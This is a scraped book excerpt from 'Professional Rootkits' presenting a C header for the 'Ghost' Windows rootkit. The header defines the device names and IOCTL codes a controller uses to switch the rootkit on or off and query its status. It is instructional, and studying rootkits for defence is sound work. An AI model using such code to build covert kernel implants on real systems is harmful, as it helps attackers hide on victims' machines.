IoManager.h


The file Controller.h provides the definitions required by both the rootkit and the controller. To separate more than one use for a single file, a keyword defined elsewhere, _GHOST_ROOTKIT_, is used. The rootkit must define this keyword, while the controller must not. This allows the rootkit and the controller to share I/O communication definitions without requiring the controller to know anything about the internal structure of the rootkit:

  // Copyright Ric Vieler, 2006 // Definitions for Ghost IO control #ifndef _GHOST_IO_H_ #define _GHOST_IO_H_ // Use CreateFile( GHOST_DEVICE_OPEN_NAME,,, externally // Use GHOST_DEVICE_CREATE_NAME internally to create device // Use GHOST_DEVICE_LINK_NAME internally to create device link #define GHOST_DEVICE_CREATE_NAME L"\\Device\\MyDeviceDriver" #define GHOST_DEVICE_LINK_NAME L"\\DosDevices\\MyDeviceDriver" #define GHOST_DEVICE_OPEN_NAME "\\\\.\\MyDeviceDriver" // Set command = GHOST_ON or GHOST_OFF for GHOST_ON_OFF_COMMAND // Get command = GHOST_ON or GHOST_OFF for GHOST_STATUS_COMMAND typedef struct {  Int    command; } GHOST_IOCTLDATA; // definitions from ntddk.h // (these won't be defined in user mode apps) #ifndef CTL_CODE #define CTL_CODE( DeviceType, Function, Method, Access ) (                 \     ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \ ) #endif #ifndef FILE_DEVICE_UNKNOWN #define FILE_DEVICE_UNKNOWN 0x00000022 #endif #ifndef METHOD_BUFFERED #define METHOD_BUFFERED 0 #endif #ifndef FILE_ANY_ACCESS #define FILE_ANY_ACCESS 0 #endif // Use these to command the rootkit! #define GHOST_ON_OFF_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS) #define GHOST_STATUS_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) #define GHOST_OFF 0 #define GHOST_ON 1 // Internal functions #ifdef _GHOST_ROOTKIT_ NTSTATUS  OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,  PVOID InputBuffer, ULONG InputBufferLength,  PVOID OutputBuffer, ULONG OutputBufferLength,  ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,  PDEVICE_OBJECT DeviceObject ); NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp ); #endif #endif 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net